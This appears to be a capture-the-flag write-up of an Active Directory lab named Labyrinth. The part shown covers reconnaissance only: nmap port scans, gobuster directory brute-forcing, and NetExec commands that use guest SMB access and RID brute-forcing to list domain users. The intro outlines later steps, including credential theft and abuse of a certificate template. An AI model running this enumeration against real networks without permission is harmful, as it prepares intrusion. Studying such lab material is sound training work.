This challenge simulates a real cyber-attack scenario where you must exploit an Active Directory.
We started with port scanning, found Active Directory and web ports, then enumerated LDAP to steal user credentials. After getting initial access via RDP, we found plaintext passwords in registry keys and compromised another account. Now we’re exploiting Certificate Service DCOM Access group membership with Certipy-AD to escalate privileges by abusing vulnerable certificate templates.
Network Enumeration
First, we scan the network to find open ports. This helps us see which services are running and check for any weak spots.
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
7680/tcp open pando-pub
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49668/tcp open unknown
49671/tcp open unknown
49680/tcp open unknown
49683/tcp open unknown
49684/tcp open unknown
49687/tcp open unknown
49692/tcp open unknown
49716/tcp open unknown
49719/tcp open unknown
49723/tcp open unknownOnce we identify open ports, we perform a deeper scan to check for service versions and potential vulnerabilities. This helps us understand the system better and find possible security weaknesses.
ORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-07 13:10:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-07T13:11:46+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
| Not valid before: 2024-06-24T14:40:22
|_Not valid after: 2025-06-24T14:40:22
443/tcp open ssl/http Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=thm-LABYRINTH-CA
| Not valid before: 2023-05-12T07:26:00
|_Not valid after: 2028-05-12T07:35:59
| http-methods:
|_ Potentially risky methods: TRACE
| tls-alpn:
|_ http/1.1
|_ssl-date: 2025-05-07T13:11:45+00:00; +3s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-07T13:11:45+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
| Not valid before: 2024-06-24T14:40:22
|_Not valid after: 2025-06-24T14:40:22
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-07T13:11:46+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
| Not valid before: 2024-06-24T14:40:22
|_Not valid after: 2025-06-24T14:40:22
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
| Not valid before: 2024-06-24T14:40:22
|_Not valid after: 2025-06-24T14:40:22
|_ssl-date: 2025-05-07T13:11:45+00:00; +3s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Not valid before: 2025-05-06T13:07:10
|_Not valid after: 2025-11-05T13:07:10
| rdp-ntlm-info:
| Target_Name: THM
| NetBIOS_Domain_Name: THM
| NetBIOS_Computer_Name: LABYRINTH
| DNS_Domain_Name: thm.local
| DNS_Computer_Name: labyrinth.thm.local
| Product_Version: 10.0.17763
|_ System_Time: 2025-05-07T13:11:36+00:00
|_ssl-date: 2025-05-07T13:11:45+00:00; +3s from scanner time.
7680/tcp open pando-pub?
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49683/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49684/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49719/tcp open msrpc Microsoft Windows RPC
49723/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1709 - 21H2 (93%), Microsoft Windows 10 1903 (93%), Microsoft Windows Server 2012 (93%), Windows Server 2019 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 10 (93%), Microsoft Windows 10 1803 (92%), Microsoft Windows 10 21H1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: LABYRINTH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 3s, deviation: 0s, median: 2s
| smb2-time:
| date: 2025-05-07T13:11:39
|_ start_date: N/A
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 187.37 ms 10.14.0.1
2 187.67 ms 10.10.16.173Once we identify open ports, we perform a deeper scan to check service versions and potential vulnerabilities. We typically notice common Active Directory ports (like 88/Kerberos, 389/LDAP, 445/SMB) along with web ports (80/HTTP, 443/HTTPS). To streamline reconnaissance, we add the target’s DNS hostnames and domains to our /etc/hosts file for easier access during testing.
HTTP Enumeration
Port 80
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=thm-LABYRINTH-CA
| Not valid before: 2023-05-12T07:26:00
|_Not valid after: 2028-05-12T07:35:59
| tls-alpn:
|_ http/1.1
|_ssl-date: 2025-05-07T13:20:18+00:00; +4s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.16.173/
[+] Method: GET
[+] Threads: 30
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client (Status: 301) [Size: 157] [--> http://10.10.16.173/aspnet_client/]
/Aspnet_client (Status: 301) [Size: 157] [--> http://10.10.16.173/Aspnet_client/]
/aspnet_Client (Status: 301) [Size: 157] [--> http://10.10.16.173/aspnet_Client/]
/ASPNET_CLIENT (Status: 301) [Size: 157] [--> http://10.10.16.173/ASPNET_CLIENT/]
Progress: 23947 / 30000 (79.82%)[ERROR] parse "http://10.10.16.173/error\x1f_log": net/url: invalid control character in URL
Progress: 29999 / 30000 (100.00%)
===============================================================
Finished
===============================================================
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.16.173/
[+] Method: GET
[+] Threads: 30
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/. (Status: 200) [Size: 703]
/iisstart.htm (Status: 200) [Size: 703]
Progress: 17129 / 17130 (99.99%)
===============================================================
Finished
===============================================================
Port 443
After hitting the web ports (80/443) with directory busting tools, we’re coming up empty – no obvious footholds or useful leaks found so far. Time to pivot approach.
AD Null Enumeration
Let’s kick off with NULL session enumeration against AD – we’ll test for guest/anonymous access first to see what we can pull without credentials.
SMB Null Enumeration
┌──(kali㉿kali)-[~/thm/ledger]
└─$ nxc smb 10.10.250.148 -u 'a' -p '' --shares
SMB 10.10.250.148 445 LABYRINTH [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False)
SMB 10.10.250.148 445 LABYRINTH [+] thm.local\a: (Guest)
SMB 10.10.250.148 445 LABYRINTH [*] Enumerated shares
SMB 10.10.250.148 445 LABYRINTH Share Permissions Remark
SMB 10.10.250.148 445 LABYRINTH ----- ----------- ------
SMB 10.10.250.148 445 LABYRINTH ADMIN$ Remote Admin
SMB 10.10.250.148 445 LABYRINTH C$ Default share
SMB 10.10.250.148 445 LABYRINTH IPC$ READ Remote IPC
SMB 10.10.250.148 445 LABYRINTH NETLOGON Logon server share
SMB 10.10.250.148 445 LABYRINTH SYSVOL Logon server share
User Enumeration
No luck with SMB file reads/writes, but we scored a user list via RID brute-forcing. Quick explainer: RID brute-forcing works by guessing Windows user IDs (like 500 for admin, 1000+ for regular users) to enumerate accounts even without permissions.
RID bruteforce
┌──(kali㉿kali)-[~/thm/ledger]
└─$ nxc smb 10.10.16.173 -u 'a' -p '' --rid-brute --log nxc_rid.brute
SMB 10.10.16.173 445 LABYRINTH [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False)
SMB 10.10.16.173 445 LABYRINTH [+] thm.local\a: (Guest)
SMB 10.10.16.173 445 LABYRINTH 498: THM\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 500: THM\Administrator (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 501: THM\Guest (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 502: THM\krbtgt (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 512: THM\Domain Admins (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 513: THM\Domain Users (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 514: THM\Domain Guests (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 515: THM\Domain Computers (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 516: THM\Domain Controllers (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 517: THM\Cert Publishers (SidTypeAlias)
SMB 10.10.16.173 445 LABYRINTH 518: THM\Schema Admins (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 519: THM\Enterprise Admins (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 520: THM\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 521: THM\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 522: THM\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 525: THM\Protected Users (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 526: THM\Key Admins (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 527: THM\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 553: THM\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.16.173 445 LABYRINTH 571: THM\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.16.173 445 LABYRINTH 572: THM\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.16.173 445 LABYRINTH 1008: THM\LABYRINTH$ (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1109: THM\DnsAdmins (SidTypeAlias)
SMB 10.10.16.173 445 LABYRINTH 1110: THM\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.16.173 445 LABYRINTH 1113: THM\greg (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1114: THM\SHANA_FITZGERALD (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1115: THM\CAREY_FIELDS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1116: THM\DWAYNE_NGUYEN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1117: THM\BRANDON_PITTMAN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1118: THM\BRET_DONALDSON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1119: THM\VAUGHN_MARTIN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1120: THM\DICK_REEVES (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1121: THM\EVELYN_NEWMAN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1122: THM\SHERI_DYER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1123: THM\NUMBERS_BARRETT (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1124: THM\SUSANA_LOWERY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1125: THM\MIKE_TODD (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1126: THM\JOSEF_MONROE (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1127: THM\DAWN_DAVID (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1128: THM\VIVIAN_VELAZQUEZ (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1129: THM\WESLEY_FULLER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1130: THM\MARISOL_LANG (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1131: THM\DIONNE_MCCOY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1132: THM\NOEL_BOOTH (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1133: THM\TAMRA_BULLOCK (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1134: THM\ROLAND_COLE (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1135: THM\KATHY_WYNN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1136: THM\LORENA_BENSON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1137: THM\FELIX_CHARLES (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1138: THM\ROBERTO_MORIN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1139: THM\VICTOR_WALTERS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1140: THM\AL_HAMPTON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1141: THM\RAYMUNDO_HOLLOWAY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1142: THM\FRANKIE_ASHLEY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1143: THM\DUANE_DRAKE (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1144: THM\CODY_ROY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1145: THM\ANDERSON_CARDENAS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1146: THM\ARIEL_SYKES (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1147: THM\DION_SANTOS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1148: THM\LAVERN_GOODWIN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1149: THM\BRENTON_HENRY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1150: THM\ROB_SALAZAR (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1151: THM\RITA_HOWE (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1152: THM\LETITIA_BERG (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1153: THM\CECILE_PATRICK (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1154: THM\PRINCE_HOFFMAN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1155: THM\KURT_GILMORE (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1156: THM\JASPER_GARDNER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1157: THM\YVONNE_NEWTON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1158: THM\SHELLEY_BEARD (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1159: THM\SILAS_WALLS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1160: THM\AMOS_MCPHERSON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1161: THM\DIEGO_HARTMAN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1162: THM\DINO_CARSON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1163: THM\JOSHUA_MOSLEY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1164: THM\HESTER_MCMAHON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1165: THM\MARJORIE_QUINN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1166: THM\LOU_BENNETT (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1167: THM\LOU_CANTRELL (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1168: THM\KERRY_JOHNSON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1169: THM\DIANE_ROWE (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1170: THM\RANDY_HOWELL (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1171: THM\WALDO_HOUSTON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1172: THM\FANNY_RIVERA (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1173: THM\ANNMARIE_RANDALL (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1174: THM\VIOLET_MEJIA (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1175: THM\MARVA_CALLAHAN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1176: THM\AMOS_LEONARD (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1177: THM\STELLA_RIVERS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1178: THM\JEROME_FERRELL (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1179: THM\74820323SA (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1180: THM\DERICK_BLEVINS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1181: THM\JANELL_GREGORY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1182: THM\SPENCER_DODSON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1183: THM\MILAGROS_HOGAN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1184: THM\LIZA_DALE (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1185: THM\ADOLPH_PUCKETT (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1186: THM\BRANDIE_GRANT (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1187: THM\EVERETTE_HUFFMAN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1188: THM\RITA_BRADFORD (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1189: THM\ISIAH_WALKER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1190: THM\IRWIN_MOON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1191: THM\569434710SA (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1192: THM\SUZANNE_GREENE (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1193: THM\FAUSTINO_SCHROEDER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1194: THM\ANNETTE_HUBER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1195: THM\ANTON_HODGES (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1196: THM\HILARIO_HAYNES (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1197: THM\TANYA_COOK (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1198: THM\KIM_SCOTT (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1199: THM\DEANNE_STOKES (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1200: THM\ALINE_BROWN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1201: THM\6643765058SA (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1202: THM\DICK_CONRAD (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1203: THM\SHANNON_BOWMAN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1204: THM\OLGA_VANG (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1205: THM\MABLE_FORD (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1206: THM\NONA_MARSH (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1207: THM\ZELMA_HERRERA (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1208: THM\LOU_CHAN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1209: THM\CONNIE_BARKER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1210: THM\8429491684SA (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1211: THM\JAIME_KNAPP (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1212: THM\STELLA_FLYNN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1213: THM\RUSS_WEISS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1214: THM\LILIA_HICKS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1215: THM\ELTON_WIGGINS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1217: THM\JULIA_RIOS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1218: THM\RUBIN_BANKS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1219: THM\QUEEN_GARNER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1220: THM\CHESTER_LONG (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1221: THM\JERRI_LANCASTER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1222: THM\IDA_ORR (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1223: THM\SETH_MCKAY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1224: THM\SAMANTHA_MILLS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1225: THM\GARLAND_HORTON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1226: THM\ALPHONSE_HICKMAN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1227: THM\ANGELO_CASH (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1228: THM\CELINA_FISHER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1229: THM\CHRISTIAN_SANFORD (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1230: THM\KRIS_BARNES (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1231: THM\7063939681SA (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1232: THM\GLENNA_GRAY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1233: THM\JOSHUA_SIMMONS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1234: THM\KIRBY_CLARK (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1235: THM\TEDDY_HEATH (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1236: THM\PHYLLIS_MERCER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1237: THM\KATE_TODD (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1238: THM\3513161954SA (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1239: THM\SUZETTE_NORMAN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1240: THM\KARYN_CLARK (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1241: THM\KATHRYN_BARRETT (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1242: THM\PATSY_FULTON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1243: THM\ROSIE_CORTEZ (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1244: THM\GRACIE_HAYNES (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1245: THM\HUGO_EATON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1246: THM\SEAN_MARTIN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1247: THM\MAI_BARLOW (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1248: THM\BERNARD_CARNEY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1249: THM\DARCY_MARSHALL (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1250: THM\CHANDRA_HINTON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1251: THM\DEVIN_EMERSON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1252: THM\JEAN_BURNS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1253: THM\LOYD_CARNEY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1254: THM\ERICKA_COFFEY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1255: THM\LISA_GREENE (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1256: THM\AUGUST_MCCRAY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1257: THM\ARNULFO_MCKENZIE (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1258: THM\WILFREDO_BARTON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1259: THM\VITO_CRAIG (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1260: THM\GIOVANNI_WELLS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1261: THM\VONDA_DUFFY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1262: THM\SHERYL_MCDANIEL (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1263: THM\JANINE_MARKS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1264: THM\PHYLLIS_MCCOY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1265: THM\AMADO_WITT (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1266: THM\LAURENCE_HAMILTON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1267: THM\LORRIE_AVERY (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1268: THM\JAMAR_TATE (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1269: THM\MATHEW_MAYER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1270: THM\DEAN_YOUNG (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1271: THM\SHERYL_STOUT (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1272: THM\JOSUE_BURNETT (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1273: THM\LORETTA_PATTERSON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1274: THM\COLBY_MALDONADO (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1275: THM\WHITNEY_NORTON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1276: THM\MONIQUE_FUENTES (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1277: THM\MARION_MERRITT (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1278: THM\REID_GILBERT (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1279: THM\WILTON_LARSEN (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1280: THM\MERLE_FRANKS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1281: THM\GUY_MORRIS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1282: THM\ALI_HOLLAND (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1283: THM\EULA_FERGUSON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1284: THM\EDWARD_SIMS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1285: THM\SUSANNA_HERRING (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1286: THM\FAYE_ORTEGA (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1287: THM\WILTON_ROMERO (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1288: THM\EMILY_ATKINSON (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1289: THM\STACIE_FLETCHER (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1290: THM\ART_SMALL (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1291: THM\5103729844SA (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1292: THM\FAYE_JARVIS (SidTypeUser)
